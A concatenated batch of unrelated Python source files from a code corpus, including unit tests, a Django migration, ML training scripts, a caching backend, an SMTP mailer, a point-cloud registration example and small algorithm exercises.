self.assertEqual(s.scores, [100, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str4)
self.assertTrue('Team 0 has 100 points.' in str4)
self.assertTrue('Team 1 has 0 points.' in str4)
self.assertEqual(str4, repr4)
s.games[2].result = dominoes.Result(2, True, 50)
g3 = s.next_game()
str5 = str(s)
repr5 = repr(s)
self.assertEqual(len(s.games), 4)
self.assertEqual(len(g3.board), 0)
self.assertEqual(g3.turn, 2)
self.assertTrue(bool(g3.valid_moves))
self.assertIsNone(g3.result)
self.assertEqual(s.scores, [150, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str5)
self.assertTrue('Team 0 has 150 points.' in str5)
self.assertTrue('Team 1 has 0 points.' in str5)
self.assertEqual(str5, repr5)
s.games[3].result = dominoes.Result(3, False, -50)
g4 = s.next_game()
str6 = str(s)
repr6 = repr(s)
self.assertEqual(len(s.games), 5)
self.assertEqual(len(g4.board), 0)
self.assertEqual(g4.turn, 3)
self.assertTrue(bool(g4.valid_moves))
self.assertIsNone(g4.result)
self.assertEqual(s.scores, [150, 50])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str6)
self.assertTrue('Team 0 has 150 points.' in str6)
self.assertTrue('Team 1 has 50 points.' in str6)
self.assertEqual(str6, repr6)
s.games[4].result = dominoes.Result(2, False, 0)
g5 = s.next_game()
str7 = str(s)
repr7 = repr(s)
self.assertEqual(len(s.games), 6)
self.assertEqual(len(g5.board), 0)
self.assertEqual(g5.turn, 3)
self.assertTrue(bool(g5.valid_moves))
self.assertIsNone(g5.result)
self.assertEqual(s.scores, [150, 50])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str7)
self.assertTrue('Team 0 has 150 points.' in str7)
self.assertTrue('Team 1 has 50 points.' in str7)
self.assertEqual(str7, repr7)
s.games[5].result = dominoes.Result(0, True, 100)
self.assertIsNone(s.next_game())
str8 = str(s)
repr8 = repr(s)
self.assertEqual(len(s.games), 6)
self.assertEqual(s.scores, [250, 50])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str8)
self.assertTrue('Team 0 has 250 points.' in str8)
self.assertTrue('Team 1 has 50 points.' in str8)
self.assertEqual(str8, repr8)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
62958
|
<filename>tests/__init__.py
__author__ = 'Elad'
|
StarcoderdataPython
|
3302975
|
<reponame>Hoter11/WebProject
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-19 10:25
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_entry_text'),
]
operations = [
migrations.AddField(
model_name='entry',
name='identifier',
field=models.CharField(default=None, max_length=4),
preserve_default=False,
),
]
|
StarcoderdataPython
|
4939423
|
<gh_stars>1-10
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import json
import getpass
"""
We start an SMTP server with gmail (the 587 is a port number). smtp_mailer.ehlo() sends a command to the server to identify ourselves. The smtplib documentation says we don't need to call the ehlo() function explicitly, but we'll do it anyway for reference and just to make sure we understand kind of what happens in the smtplib module. We then use smtp_mailer.starttls() to start the TLS protocol, to allow the emails to be sent securely.
"""
smtp_mailer = smtplib.SMTP("smtp.gmail.com", 587)
smtp_mailer.ehlo()
smtp_mailer.starttls()
"""
Load and use details.json to prefill some fields in the email message that is eventually sent, makes it easier for testing.
"""
with open("../supporting_files/details.json") as details:
json_data = json.loads(details.read())
user_email = json_data["MyEmail"]
# Always asks for user password instead of storing, for security
user_password = getpass.getpass(f"Enter the password for {user_email} (The password will not show " "up for security purposes): ")
smtp_mailer.login(user_email, user_password)
print("Login successful")
message = MIMEMultipart()
message["From"] = user_email
message["To"] = json_data["To"]
message["Subject"] = json_data["Subject"]
email_body = json_data["Body"]
message.attach(MIMEText(email_body, "plain"))
smtp_mailer.send_message(message)
smtp_mailer.quit()
|
StarcoderdataPython
|
12804274
|
'''
This is based on cnn35_64. This is after the first pilot.
Changes:
-don't filter out # in the tokenizer, tokenize both together. or save tokenizer https://stackoverflow.com/questions/45735070/keras-text-preprocessing-saving-tokenizer-object-to-file-for-scoring
-use 'number' w2v as representation for any digit
-shuffling problem should be check before advancing: plot random selection of conv1 layers. theys should all be 14 or 15.
-tune hyperparameters.
'''
from sklearn.linear_model import LogisticRegression
import time
import datetime
import numpy as np
import pandas as pd
from keras.preprocessing.text import Tokenizer
import pickle
from sklearn.svm import LinearSVC
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer
from sklearn.pipeline import Pipeline
from sklearn.metrics import classification_report, confusion_matrix
import matplotlib.pyplot as plt
plt.switch_backend('agg')
from keras.utils import np_utils
from numpy.random import seed
seed(123)
import os
import data_helpers
import config
import matplotlib.pyplot as plt
plt.switch_backend('agg')
# Parameters
# =====================================================================
categories = config.categories
verbose = config.verbose
save_checkpoints = config.save_checkpoints
plot_RSA = config.plot_RSA
if config.local_or_cluster:
categories = categories[:3]
epochs=1
verbose=1
else:
epochs = config.epochs # it will probably need more.
# epochs = 6
#
save_checkpoints=False
print('running for '+str(epochs)+' epochs')
if config.local_or_cluster:
# directory_name = 'svm_gs0_test'
directory_name = datetime.datetime.now().strftime("%y-%m-%d-%H-%M-%S")
file_name = 'logreg_tfidf'
else:
# directory_name = 'svm_gs0_test'
directory_name = datetime.datetime.now().strftime("%y-%m-%d-%H-%M-%S")
file_name = os.path.basename(__file__)
print('running '+directory_name+' '+file_name)
categories = ['University','Decoration','MilitaryConflict','MilitaryPerson','Politician', 'Monarch']
Xtrain, Ytrain = data_helpers.load_all_data(config.train_path,config.validation_path, categories, shuffle=False) # I changed this so it combines train and test
Xtest, Ytest = data_helpers.load_data(config.test_path, categories)
# Xtest_raw, Ytest_raw = data_helpers.load_data_raw(config.test_path, categories)
# X, y= data_helpers.load_whole_dataset(config.train_path, config.validation_path, config.test_path,categories,load_all=True, shuffle=False,one_hot=False)
# Remove Stopwords
# with open('stopwords-it2.txt', 'r') as f:
# sw = f.readlines()
#
# italian_stop_words = [n.replace('\n','') for n in sw]
#
# Xtrain2 = []
# for sentence in Xtrain:
# sentence_no_stopwords = ' '.join([word for word in sentence.split() if word not in italian_stop_words])
# Xtrain2.append(sentence_no_stopwords)
#
# Xtest2 = []
# for sentence in Xtest:
# sentence_no_stopwords = ' '.join([word for word in sentence.split() if word not in italian_stop_words])
# Xtest2.append(sentence_no_stopwords)
# #
# # ## Encode Ytrain
# # # =====================================================================================
# # one hot encode and integer encode
# # Ytrain_encoded = np_utils.to_categorical(Ytrain)
# # Ytrain_integer = np.array(Ytrain)
# # Ytest_encoded = np_utils.to_categorical(Ytest)
# # Ytest_integer = np.array(Ytest)
# #
# # # Zero pad (encode) Xtrain and Xtest
# # # ==================================================================================================
# tokenizer = Tokenizer(filters='') #depending on word embedding, set lower=False.
# tokenizer.fit_on_texts(np.append(np.array(Xtrain2), np.array(Xtest2)))
# sequences = tokenizer.texts_to_sequences(Xtrain2)
# sequences2 = tokenizer.texts_to_sequences(Xtest2)
# # sequences3 = tokenizer.texts_to_sequences(X)
# word_index = tokenizer.word_index
# print('Found %s unique tokens.' % len(word_index))
#
# # Xtrain_encoded = pad_sequences(sequences, maxlen=sequence_length, padding='post')
# # Xtest_encoded = pad_sequences(sequences2, maxlen=sequence_length, padding='post')
# # X_encoded = pad_sequences(sequences3, maxlen=sequence_length, padding='post')
#
# def load_obj(path_and_filename):
# with open(path_and_filename, 'rb') as f:
# return pickle.load(f)
#
# embeddings_index = load_obj(config.word_embeddings_path+'/gensim_it_w2v.pkl') #dictionary embeddings_index.get('è') returns word embedding
#
#
#
# number = np.random.normal(0., 0.23, 300)
#
# embedding_dim = 300
#
# embedding_matrix = np.zeros((len(word_index) + 1, embedding_dim)) # this will be all embeddings for my vocabulary
#
# for word, i in word_index.items():
# embedding_vector = embeddings_index.get(word)
# if embedding_vector is not None:
# # words not found in embedding index will be all-zeros.
# embedding_matrix[i] = embedding_vector
# elif "#" in word:
# embedding_matrix[i] = number
# Create average sentence vectors
# Xtrain = []
# for sequence in sequences:
# all_word_embeddings = []
# for word_id in sequence:
# embedding = embedding_matrix[word_id]
# if np.sum(embedding)!=0.0:
# all_word_embeddings.append(embedding)
# mean_sentence_vector = list(pd.DataFrame(all_word_embeddings).mean())
# if len(mean_sentence_vector)==0:
# mean_sentence_vector = list(np.random.normal(0., 0.23, 300))
# Xtrain.append(mean_sentence_vector)
#
# Xtest = []
# for sequence in sequences2:
# all_word_embeddings = []
# for word_id in sequence:
# embedding = embedding_matrix[word_id]
# all_word_embeddings.append(embedding)
# mean_sentence_vector = list(pd.DataFrame(all_word_embeddings).mean())
# if len(mean_sentence_vector)==0:
# mean_sentence_vector = list(np.random.normal(0., 0.23, 300))
# Xtest.append(mean_sentence_vector)
path_to_dir = os.path.join(config.save_to, directory_name + '/')
try: os.makedirs(path_to_dir)
except: pass
print('directory_name: '+directory_name)
print('path_to_dir: '+path_to_dir)
# Xtrain = np.array(Xtrain)
# Xtest = np.array(Xtest)
#
# np.save(config.word_embeddings_path+'Xtrain_w2v_mean', Xtrain)
# np.save(config.word_embeddings_path+'Xtest_w2v_mean', Xtest)
# Model
## ======================================================================================================
print("Creating Model...")
with open(path_to_dir + 'log.txt', 'a+') as f:
f.write(file_name + '\n')
f.write(directory_name+ '\n\n')
# Cs = [0.01, 0.1, 1, 10]
# kernels = ['linear', 'rbf']
# kernels = ['linear']
# max_features_all = [100000,None]
# stop_words = [italian_stop_words, None]
# Final
# Top1 and Top5 accuracy on test set.
# clf = LinearSVC(verbose=verbose)
if config.local_or_cluster:
Xtrain_toy = []
for i in range(0,len(Xtrain), 100):
Xtrain_toy.append(Xtrain[i])
Ytrain_toy = []
for i in range(0, len(Ytrain), 100):
Ytrain_toy.append(Ytrain[i])
Xtest_toy = []
for i in range(0,len(Xtest), 100):
Xtest_toy.append(Xtest[i])
Ytest_toy = []
for i in range(0, len(Ytest), 100):
Ytest_toy.append(Ytest[i])
Xtrain = Xtrain_toy[:]
Ytrain = Ytrain_toy[:]
Xtest = Xtest_toy[:]
Ytest = Ytest_toy[:]
start = time.time()
pipeline = Pipeline([('vect', CountVectorizer(ngram_range=(1, 3), min_df=2, max_features=None)),
('tfidf', TfidfTransformer()),
('clf', LogisticRegression(verbose=verbose, n_jobs=-1)), ])
pipeline.fit(Xtrain, Ytrain)
probs = pipeline.predict_proba(Xtest)
best_1 = np.argsort(probs, axis=1)
best_1 = [n[-1] for n in best_1]
top1_accuracy = np.round(np.sum(np.array(Ytest)==np.array(best_1))/len(Ytest),4)
best_2 = np.argsort(probs, axis=1)
best_2 = [n[-2:] for n in best_2]
top2_acc = []
for i in range(len(best_2)):
if Ytest[i] in best_2[i]:
top2_acc.append(1)
else:
top2_acc.append(0)
top2_accuracy = np.round(np.sum(top2_acc)/len(Ytest),4)
best_3 = np.argsort(probs, axis=1)
best_3 = [n[-3:] for n in best_3]
top3_acc = []
for i in range(len(best_3)):
if Ytest[i] in best_3[i]:
top3_acc.append(1)
else:
top3_acc.append(0)
top3_accuracy = np.round(np.sum(top3_acc)/len(Ytest),4)
#
# best_5 = np.argsort(probs, axis=1)
# best_5 = [n[-5:] for n in best_5]
# top5_acc = []
# for i in range(len(best_5)):
# if Ytest[i] in best_5[i]:
# top5_acc.append(1)
# else:
# top5_acc.append(0)
# top5_accuracy = np.round(np.sum(top5_acc)/len(Ytest),4)
# Ypredict_encoded = np_utils.to_categorical(Ypredict.argmax(axis=-1))
# Ypredict_integer = Ypredict.argmax(axis=-1)
# Save outputs
np.save(path_to_dir + 'Ypredict_integer', best_1)
np.save(path_to_dir + 'accuracy_integer_top3', top3_acc)
# np.save(path_to_dir + 'accuracy_integer_top5', top5_acc)
import plot_outputs
clas_rep = classification_report(Ytest, best_1,target_names=categories)
df_clas_rep, df_clas_rep_latex = plot_outputs.classification_report_df(clas_rep)
cm = confusion_matrix(y_true=Ytest, y_pred=best_1,sample_weight=None) # TODO:change to test set for final model
pd.DataFrame(cm, columns=categories, index=categories).to_csv(path_to_dir+'cm.csv')
with open(path_to_dir + 'log.txt', 'a+') as f:
end = time.time()
f.write(str(i)+'=================\n')
f.write('time: ' + str(np.round(end - start, 2))+'\n')
f.write('Top-1 Accuracy: ' +str(top1_accuracy)+'\n')
f.write('Top-2 Accuracy: ' + str(top2_accuracy) + '\n')
f.write('Top-3 Accuracy: ' + str(top3_accuracy) + '\n')
# f.write('Top-5 Accuracy: ' + str(top5_accuracy) + '\n')
f.write(str(pipeline.get_params())+'\n\n')
f.write('Classification Report: \n'+df_clas_rep_latex)
#
#
# # CV
# # ====================================================================
# from sklearn.model_selection import cross_val_score
#
# start = time.time()
# scores = cross_val_score(pipeline, Xtrain, Ytrain, cv=5, n_jobs=-1)
#
# with open(path_to_dir + 'log.txt', 'a+') as f:
# end = time.time()
# f.write(str(i)+'=================\n')
# f.write('time: ' + str(np.round(end - start, 2))+'\n')
# f.write(str(scores)+'\n')
# f.write('The mean score and the 95% confidence interval of the score estimate are hence given by:'+ '\n')
# f.write('Accuracy: '+str(np.round(scores.mean(),4))+' +/- '+str((scores.std() * 2).round(2))+ '\n')
# f.write('SD: '+str(scores.std())+' variance: '+str(scores.var())+ '\n')
# TIFIDF
# ================================================================================================
# def top_tfidf_feats(row, features, top_n=20):
# ''' Get top n tfidf values in row and return them with their corresponding feature names.'''
# topn_ids = np.argsort(row)[::-1][:top_n]
# top_feats = [(features[i], row[i]) for i in topn_ids]
# df = pd.DataFrame(top_feats)
# df.columns = ['feature', 'tfidf']
# return df
#
# # def top_feats_in_doc(Xtr, features, row_id, top_n=25):
# # ''' Top tfidf features in specific document (matrix row) '''
# # row = np.squeeze(Xtr[row_id].toarray())
# # return top_tfidf_feats(row, features, top_n)
#
#
# def top_mean_feats(Xtr, features, grp_ids=None, min_tfidf=0.1, top_n=25):
# ''' Return the top n features that on average are most important amongst documents in rows
# indentified by indices in grp_ids. '''
# if grp_ids:
# D = Xtr[grp_ids].toarray()
# else:
# D = Xtr.toarray()
# D[D < min_tfidf] = 0
# tfidf_means = np.mean(D, axis=0)
# return top_tfidf_feats(tfidf_means, features, top_n)
#
# def top_feats_by_class(Xtr, y, features, min_tfidf=0.1, top_n=25):
# ''' Return a list of dfs, where each df holds top_n features and their mean tfidf value
# calculated across documents with the same class label. '''
# dfs = []
# labels = np.unique(y)
# for label in labels:
# ids = np.where(y==label)
# feats_df = top_mean_feats(Xtr, features, ids, min_tfidf=min_tfidf, top_n=top_n)
# feats_df.label = label
# dfs.append(feats_df)
# return dfs
#
#
#
# def plot_tfidf_classfeats_h(dfs):
# ''' Plot the data frames returned by the function plot_tfidf_classfeats(). '''
# fig = plt.figure(figsize=(12, 9), facecolor="w")
# x = np.arange(len(dfs[0]))
# for i, df in enumerate(dfs):
# ax = fig.add_subplot(1, len(dfs), i+1)
# ax.spines["top"].set_visible(False)
# ax.spines["right"].set_visible(False)
# ax.set_frame_on(False)
# ax.get_xaxis().tick_bottom()
# ax.get_yaxis().tick_left()
# ax.set_xlabel("Mean Tf-Idf Score", labelpad=16, fontsize=14)
# ax.set_title("label = " + str(df.label), fontsize=16)
# ax.ticklabel_format(axis='x', style='sci', scilimits=(-2,2))
# ax.barh(x, df.tfidf, align='center', color='#3F5D7D')
# ax.set_yticks(x)
# ax.set_ylim([-1, x[-1]+1])
# yticks = ax.set_yticklabels(df.feature)
# plt.subplots_adjust(bottom=0.09, right=0.97, left=0.15, top=0.95, wspace=0.52)
# plt.show()
#
#
# tfidf = TfidfVectorizer(min_df=2, max_features=None, ngram_range=(1, 3))
#
# Xtr = tfidf.fit_transform(np.array(Xtrain))
# feature_array = np.array(tfidf.get_feature_names())
# response = tfidf.transform(['it can fly'])
# tfidf_sorting = np.argsort(np.array(response)).flatten()[::-1]
# n = 3
# top_n = feature_array[tfidf_sorting][:n]
#
#
#
#
#
# vec = vec_pipe.named_steps['vec']
# features = vec.get_feature_names()
#
# dfs = top_feats_by_class(Xtr, Ytrain, features, min_tfidf=0.1, top_n=20)
# plot_tfidf_classfeats_h(dfs)
# Gridsearch
# =============
#
# Cs = [1]
# # kernels = ['linear', 'rbf']
# kernels = ['linear']
# max_features_all = [None]
# # stop_words = [None]
#
#
# l=[]
# for kernel in kernels:
# for C in Cs:
# for max_features in max_features_all:
# l.append([kernel, C, max_features])
#
#
# gs_numb = int(sys.argv[1])
# i = int(sys.argv[1])
# print(i)
# for parameters in l[gs_numb:gs_numb+6]:
# # drop, batch_size, optimizer, activation2 = parameters
#
# kernel, C, max_features = parameters
# # if kernel == 'linear':
# # pipeline = Pipeline([('vect', CountVectorizer(ngram_range=(1, 3), min_df=2, max_features=max_features)),
# # ('tfidf', TfidfTransformer()),
# # ('clf', LogisticRegression(C=C, verbose=verbose, n_jobs=-1)), ])
# # else:
# # pipeline = Pipeline([('vect', CountVectorizer(ngram_range=(1, 3), min_df=2, max_features=max_features)),
# # ('tfidf', TfidfTransformer()),
# # ('clf', SVC(C=C, kernel=kernel, verbose=verbose)), ])
# clf = LogisticRegression(C=C, verbose=verbose, n_jobs=-1)
# start = time.time()
# clf.fit(Xtrain, Ytrain)
# accuracy = clf.score(Xtest, Ytest)
# with open(path_to_dir + 'log.txt', 'a+') as f:
# end = time.time()
# f.write(str(i)+'=================\n')
# f.write('time: ' + str(np.round(end - start, 2))+'\n')
# f.write('Parameters: '+str(parameters)+'\n')
# f.write('Loss and Accuracy: ' +str(accuracy)+'\n')
# f.write(str(np.round(accuracy,4)) + '\n\n')
# i += 1
#
# if save_checkpoints:
# filepath = path_to_dir+"weights-improvement-{epoch:02d}-{val_acc:.2f}.hdf5" #https://machinelearningmastery.com/check-point-deep-learning-models-keras/
# checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=verbose, save_best_only=True, mode='auto')
#
# print("Training Model...")
# if save_checkpoints:
# history = model.fit(Xtrain_encoded, Ytrain_encoded, batch_size=batch_size, epochs=epochs, verbose=verbose, callbacks=[checkpoint]) # starts training
# else:
# history = model.fit(Xtrain_encoded,Ytrain_encoded, batch_size=batch_size, epochs=epochs, verbose=verbose) # starts training
# outputs:
# ============================================================================================================================
# SAVE
|
StarcoderdataPython
|
382470
|
from __future__ import absolute_import, division, print_function, unicode_literals
import hashlib
import io
import warnings
from diskcache import Cache
from ._base import Backend
SIZE_LIMIT = 5e9
CACHE_VERSION = "v0"
class CachingBackend(Backend):
def __init__(self, cacheroot, authoritative_backend):
self._cacheroot = cacheroot
self._authoritative_backend = authoritative_backend
self._cache = Cache(cacheroot, size_limit=int(SIZE_LIMIT))
def read_contextmanager(self, name, checksum_sha256=None, seekable=False):
if checksum_sha256 is not None:
return _CachingBackendContextManager(
self._authoritative_backend, self._cache, name, checksum_sha256)
else:
return self._authoritative_backend.read_contextmanager(
name, checksum_sha256, seekable=seekable)
def write_file_handle(self, name):
return self._authoritative_backend.write_file_handle(name)
class _CachingBackendContextManager(object):
def __init__(self, authoritative_backend, cache, name, checksum_sha256):
self.authoritative_backend = authoritative_backend
self.cache = cache
self.name = name
self.checksum_sha256 = checksum_sha256
self.handle = None
def __enter__(self):
cache_key = "{}-{}".format(CACHE_VERSION, self.checksum_sha256)
try:
file_data = self.cache.read(cache_key)
except KeyError:
# not in cache :(
with self.authoritative_backend.read_contextmanager(self.name) as sfh:
file_data = sfh.read()
# TODO: consider removing this if we land a more generalized solution that
# protects against corruption regardless of backend.
sha256 = hashlib.sha256(file_data).hexdigest()
if sha256 != self.checksum_sha256:
warnings.warn(
"Checksum of tile data does not match the manifest checksum! Not "
"writing to cache")
else:
self.cache.set(cache_key, file_data)
self.handle = io.BytesIO(file_data)
else:
# If the data is small enough, the DiskCache library returns the cache data
# as bytes instead of a buffered reader.
# In that case, we want to wrap it in a file-like object.
if isinstance(file_data, io.IOBase):
self.handle = file_data
else:
self.handle = io.BytesIO(file_data)
return self.handle.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
if self.handle is not None:
return self.handle.__exit__(exc_type, exc_val, exc_tb)
|
StarcoderdataPython
|
8150334
|
<reponame>felixfrank/Open3D
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
from open3d import *
import numpy as np
if __name__ == "__main__":
set_verbosity_level(VerbosityLevel.Debug)
pcds = []
for i in range(3):
pcd = read_point_cloud(
"../../TestData/ICP/cloud_bin_%d.pcd" % i)
downpcd = voxel_down_sample(pcd, voxel_size = 0.02)
pcds.append(downpcd)
draw_geometries(pcds)
pose_graph = PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(PoseGraphNode(odometry))
n_pcds = len(pcds)
for source_id in range(n_pcds):
for target_id in range(source_id + 1, n_pcds):
source = pcds[source_id]
target = pcds[target_id]
print("Apply point-to-plane ICP")
icp_coarse = registration_icp(source, target, 0.3,
np.identity(4),
TransformationEstimationPointToPlane())
icp_fine = registration_icp(source, target, 0.03,
icp_coarse.transformation,
TransformationEstimationPointToPlane())
transformation_icp = icp_fine.transformation
information_icp = get_information_matrix_from_point_clouds(
source, target, 0.03, icp_fine.transformation)
print(transformation_icp)
# draw_registration_result(source, target, np.identity(4))
print("Build PoseGraph")
if target_id == source_id + 1: # odometry case
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(
PoseGraphNode(np.linalg.inv(odometry)))
pose_graph.edges.append(
PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain = False))
else: # loop closure case
pose_graph.edges.append(
PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain = True))
print("Optimizing PoseGraph ...")
option = GlobalOptimizationOption(
max_correspondence_distance = 0.03,
edge_prune_threshold = 0.25,
reference_node = 0)
global_optimization(pose_graph,
GlobalOptimizationLevenbergMarquardt(),
GlobalOptimizationConvergenceCriteria(), option)
print("Transform points and display")
for point_id in range(n_pcds):
print(pose_graph.nodes[point_id].pose)
pcds[point_id].transform(pose_graph.nodes[point_id].pose)
draw_geometries(pcds)
|
StarcoderdataPython
|
3561096
|
<reponame>davjohnst/fundamentals<filename>fundamentals/binary_search_tree/binary_search_tree.py
#!/usr/bin/env python
class BSTNode(object):
def __init__(self, parent, left, right, value):
self.parent = parent
self.left = left
self.right = right
self.value = value
class BST(object):
def __init__(self):
self.root = None
def put(self, val):
if self.root is None:
self.root = BSTNode(None, None, None, val)
else:
self._put(val, self.root)
def _put(self, val, current_node):
if val < current_node.value:
if current_node.left is None:
current_node.left = BSTNode(current_node, None, None, val)
else:
self._put(val, current_node.left)
else:
if current_node.right is None:
current_node.right = BSTNode(current_node, None, None, val)
else:
self._put(val, current_node.right)
def contains(self, val):
current_node = self.root
while current_node is not None:
if current_node.value == val:
return True
elif val < current_node.value:
current_node = current_node.left
else:
current_node = current_node.right
return False
def pre_order_traversal(self, func):
self._pre_order_traversal(self.root, func)
def _pre_order_traversal(self, node, func):
if node is not None:
func(node)
if node.left is not None:
self._pre_order_traversal(node.left, func)
if node.right is not None:
self._pre_order_traversal(node.right, func)
def main():
b = BST()
b.put(10)
b.put(4)
b.put(14)
b.put(2)
b.put(1)
def print_val(node):
print node.value
b.pre_order_traversal(print_val)
print b.contains(1)
print b.contains(3)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
9619358
|
<filename>1020.py<gh_stars>1-10
n = int(input())
h = int(n // 365)
n -= h * 365
m = int(n // 30)
n -= m * 30
print(h, 'ano(s)')
print(m, 'mes(es)')
print(n, 'dia(s)')
|
StarcoderdataPython
|
4976109
|
import unittest
from cache_gs.utils.timestamp import (base64_to_int, int_to_base64,
section_key_hash)
class TestTimeStamp(unittest.TestCase):
def test_base64(self):
b = int_to_base64(10)
i = base64_to_int(b)
self.assertEqual(10, i)
def test_lenght(self):
i = 1
len_base64 = len(int_to_base64(0))
igual = True
last = 2**32
while i <= last and igual:
igual = len(int_to_base64(i)) == len_base64
i *= 2
self.assertTrue(igual)
def test_section_key_hash(self):
hash = section_key_hash('section', 'key')
self.assertIsNotNone(hash)
|
StarcoderdataPython
|
12858804
|
import numpy as np
import torch
from torchvision.utils import make_grid
from base import BaseTrainer
from utils import inf_loop, MetricTracker, confusion_matrix_image
import copy
import sys
import time
from model.metric import Accuracy, TopkAccuracy
def get_top_k(x, ratio):
"""it will sample the top 1-ratio of the samples."""
x_data = x.view(-1)
x_len = x_data.nelement()
top_k = max(1, int(x_len * (1 - ratio)))
# get indices and the corresponding values
if top_k == 1:
_, selected_indices = torch.max(x_data.abs(), dim=0, keepdim=True)
else:
_, selected_indices = torch.topk(
x_data.abs(), top_k, largest=True, sorted=False
)
return x_data[selected_indices], selected_indices
def get_mask(flatten_arr, indices):
mask = torch.zeros_like(flatten_arr)
mask[indices] = 1
mask = mask.bool()
return mask.float(), (~mask).float()
class Trainer(BaseTrainer):
"""
Trainer class
"""
def __init__(self, model, criterion, metric_ftns, optimizer, config, data_loader,
valid_data_loader=None, lr_scheduler=None, len_epoch=None):
super().__init__(model, criterion, metric_ftns, optimizer, config)
self.config = config
self.data_loader = data_loader
if len_epoch is None:
# epoch-based training
self.len_epoch = len(self.data_loader)
else:
# iteration-based training
self.data_loader = inf_loop(data_loader)
self.len_epoch = len_epoch
self.valid_data_loader = valid_data_loader
self.do_validation = self.valid_data_loader is not None
self.lr_scheduler = lr_scheduler
self.log_step = int(np.sqrt(data_loader.batch_size))
self.deployed_model = copy.deepcopy(self.model)
self.init_model = copy.deepcopy(self.model)
self.init_model.eval()
self.deployed_model.eval()
self.accuracy = Accuracy()
self.topkaccuracy = TopkAccuracy()
self.train_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
self.valid_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
def _train_epoch(self, epoch):
"""
Training logic for an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains average loss and metric in this epoch.
"""
start = time.time()
self.model.train()
total_batch = 0
self.train_metrics.reset()
training_time = 0
for batch_idx, (data, target) in enumerate(self.data_loader):
data, target = data.to(self.device), target.to(self.device)
batch_start = time.time()
self.optimizer.zero_grad()
output = self.model(data)
loss = self.criterion(output, target)
loss.backward()
self.optimizer.step()
training_time += time.time() - batch_start
self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)
self.train_metrics.update('loss', loss.item())
for met in self.metric_ftns:
self.train_metrics.update(met.__name__, met(output, target))
total_batch += time.time() - batch_start
if batch_idx % self.log_step == 0:
self.logger.info('Train Epoch: {} {} Loss: {:.6f} Time per batch (ms) {}'.format(
epoch,
self._progress(batch_idx),
loss.item(), total_batch * 1000 / (batch_idx + 1)))
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# valid_log = self._valid_deployed(batch_idx)
# print logged informations to the screen
# for key, value in valid_log.items():
# self.logger.info('Valid deployed {:15s}: {}'.format(str(key), value))
if batch_idx == self.len_epoch:
break
log = self.train_metrics.result()
if self.do_validation:
val_log = self._valid_epoch(epoch)
log.update(**{'val_' + k: v for k, v in val_log.items()})
log['time (sec)'] = time.time() - start
log['training_time'] = training_time
if self.lr_scheduler is not None:
self.lr_scheduler.step()
return log
def _valid_epoch(self, epoch):
"""
Validate after training an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.model.eval()
self.valid_metrics.reset()
avg_loss =0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
avg_loss += loss.item()/len(self.valid_data_loader)
pred = torch.argmax(output, dim=1)
correct += torch.sum(pred == target).item()
total += len(target)
self.writer.set_step(epoch, 'valid')
self.writer.add_scalar('loss', avg_loss)
self.writer.add_scalar('accuracy', correct/total)
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# add histogram of model parameters to the tensorboard
# for name, p in self.model.named_parameters():
# self.writer.add_histogram(name, p, bins='auto')
return self.valid_metrics.result()
def _valid_deployed(self, batch):
"""
Validate after training a batch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.deployed_model.eval()
self.valid_metrics.reset()
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
self.writer.set_step((batch - 1) * len(self.valid_data_loader) + batch_idx*len(target), 'valid')
self.valid_metrics.update('loss', loss.item())
for met in self.metric_ftns:
self.valid_metrics.update(met.__name__, met)
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
return self.valid_metrics.result()
def _progress(self, batch_idx):
base = '[{}/{} ({:.0f}%)]'
if hasattr(self.data_loader, 'n_samples'):
current = batch_idx * self.data_loader.batch_size
total = self.data_loader.n_samples
else:
current = batch_idx
total = self.len_epoch
return base.format(current, total, 100.0 * current / total)
|
StarcoderdataPython
|
4811873
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test syntax for logic expression """
import mindspore.nn as nn
from mindspore import context
context.set_context(mode=context.GRAPH_MODE)
